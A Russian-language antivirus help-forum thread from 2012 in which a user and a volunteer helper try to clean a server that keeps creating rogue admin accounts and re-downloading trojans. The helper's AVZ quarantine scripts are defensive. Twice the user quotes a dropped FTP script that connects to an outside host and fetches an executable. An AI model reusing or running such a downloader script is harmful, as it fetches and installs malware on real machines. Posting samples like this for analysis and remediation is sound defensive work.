периодически создает пользователей с правами админа и тянет из сети троянцев KIS не видит

**marcha12** · 16.05.2012, 06:38

Добрый День!

с Месяц назад - KIS стал обнаруживать троянцев, и после успешного лечения, троянцы появлялись снова, но уже с новыми названиями / модификациями.
Периодически (не пойму по какому событию) создается пользователь со случайным именем и правами локального Админа! при этом в документ энд сеттинг, иногда создается папка этого пользователя, как будто он уже входил на сервер по терминальной сессии

Пробовал откатится с помощью Acronis на 2 месяца назад с восстановлением свежих профилей пользователей - вирусная активность опять проявилась

Пробовал Cureit и Kavtool - периодически ловят вирусы / троянцы, но со временем опять появляются выше описанные симптомы. Вероятно чтото остается в системе

Зараннее благодарны за Вас труд и помощь!!
логи прилагаю :
virusinfo_syscheck.zip
hijackthis.log

Надоело быть жертвой? Стань профи по информационной безопасности, получай самую свежую информацию об угрозах и средствах защиты от ведущего российского аналитического центра Anti-Malware.ru:

**Info_bot** · 16.05.2012, 06:40

Уважаемый(ая) marcha12, спасибо за обращение на наш форум!

Помощь в лечении комьютера на VirusInfo.Info оказывается абсолютно бесплатно. Хелперы, в самое ближайшее время, ответят на Ваш запрос. Для оказания помощи необходимо предоставить логи сканирования утилитами АВЗ и HiJackThis, подробнее можно прочитать в правилах оформления запроса о помощи.

Если наш сайт окажется полезен Вам и у Вас будет такая возможность - пожалуйста поддержите проект.

**Techno** · 17.05.2012, 10:20

C:\Documents and Settings\All Users\Главное меню\Программы\Автозагрузка\killTemp.cmd - Ваше?

- Сделайте лог полного сканирования MBAM.

**marcha12** · 17.05.2012, 13:25

Спасибо, что откликнулись! Да killTemp.cmd мое - темпы чистил у юзеров. я его сегодня удалил...
также удалил явно "левые" файлы, которые рождает вирус, названия на скриншоте , сам архив могу выслать...

скрин списка ви&#1.jpg

лог полного сканирования MBAM. - делаю и выложу

еще раз спасибо!

**marcha12** · 17.05.2012, 13:29

mbam-log-2012-05-16 (19-39-16).txt

**Techno** · 18.05.2012, 09:57

Файлы такого вида в папке system32 есть? C:\WINDOWS\system32\18.exe

Повторите лог virusinfo_syscheck.zip

- Выполните в AVZ скрипт из файла ScanVuln.txt
- Откройте файл avz_log.txt из под-папки LOG.
- Пройдитесь по ссылкам из файла avz_log.txt и установите важные обновления.
- Перезагрузите компьютер.
- Повторите выполнение скрипта, чтобы убедиться, что уязвимости устранены.

**marcha12** · 18.05.2012, 14:15

Спасибо! да есть 18.exe

пробую отпишусь....

**marcha12** · 18.05.2012, 15:43

virusinfo_syscure.zip

выполнил , пофиксил уязвисостей теперь нет...

что дальше? Система чиста?

**marcha12** · 19.05.2012, 20:34

Спасибо! но пока система не чиста, т.к. сегодня появился новая учетка с админ правами

**Techno** · 19.05.2012, 22:36

- Выполните в АВЗ:

Код:

begin
 QuarantineFile('C:\WINDOWS\system32\18.exe','');
 DeleteFile('C:\WINDOWS\system32\18.exe');
ExecuteSysClean;
end.

Перезагрузите компьютер

После перезагрузки:
- Выполните в АВЗ:

Код:

begin
 CreateQurantineArchive(GetAVZDirectory+'quarantine.zip'); 
end.

Файл quarantine.zip из папки AVZ загрузите по ссылке "Прислать запрошенный карантин" вверху темы.

- Повторите все логи.

**marcha12** · 20.05.2012, 10:34

Выполнил Ваши указания ....
Заметил особенность , что прочие появляющиеся файлы удаляет регулярно KIS, но не все , но они снова появлюятся с уже другими названиями

и сегодня опять появился пользователь с случайным именем "1991212"...
kis не видит вируса в файле C:\WINDOWS\system32\hex158477567.exe и в файле onfNet.dat из этой же директории с текстом:
open jzqa.3322.org
comex
comex
get Net.exe onNet.exe
bye

**marcha12** · 20.05.2012, 10:43

virusinfo_cure.zip virusinfo_syscure.zip hijackthis.log

**marcha12** · 20.05.2012, 10:49

Файл quarantine.zip - пустой получился...

Добавлено через 5 минут

по пути C:\WINDOWS\system32 появиляется файл onfNet.dat с содержанием:
open jzqa.3322.org
comex
comex
get Net.exe onNet.exe
bye

**Techno** · 20.05.2012, 10:55

MBAM еще раз сделайте.

Уязвимости закрыли?

**marcha12** · 20.05.2012, 13:00

mbam-log-2012-05-20 (09-45-23).txt

**marcha12** · 20.05.2012, 13:01

да - скачал, установил заплатки поссылкам, заново запустил скрипт - написало -уязвимостей нет

**Techno** · 20.05.2012, 13:22

Что с проблемой?

**marcha12** · 20.05.2012, 14:40

актуальна

более того тянет чтото с инета

malware заблокировал win32.exe

Добавлено через 49 секунд

кис за сегодня прибил 40 троянских программ

Добавлено через 3 минуты

кис за сегодня прибил 40 троянских программ в карантине malware положил файл zysvchost.exe из C:\RECYCLER

Добавлено через 58 секунд

вот сильную заразу подхватил - вывести не можем

что посоветуете?

**Techno** · 20.05.2012, 17:50

Давайте с LiveCD попробуем http://virusinfo.info/showthread.php?t=15927

**marcha12** · 20.05.2012, 21:08

Спасибо!
F-secure - находит чтото но не может удалить

жаль не вижу что находит... пробуес как Вы советуете LiveCD, это завтра т.к. сегодня с дому удаленно работаю...

периодически создает пользователей с правами админа и тянет из сети троянцев KIS не видит (заявка № 120331)

Опции темы

периодически создает пользователей с правами админа и тянет из сети троянцев KIS не видит

Похожие темы

Аваст периодически блокирует создание файла x,входящий трафик значительно превышает исходящий,периодически прерывается и блокируется соединение с интернетом...

Блокировка пользователей с правами администратора. (заявка №23733)

Что-то отрубило антивиры и завладело правами админа

Комп в сети. Периодически оказывается завирусован.

Если роутер без пароля для админа, чем это черевато?

Метки для этой темы

Ваши права в разделе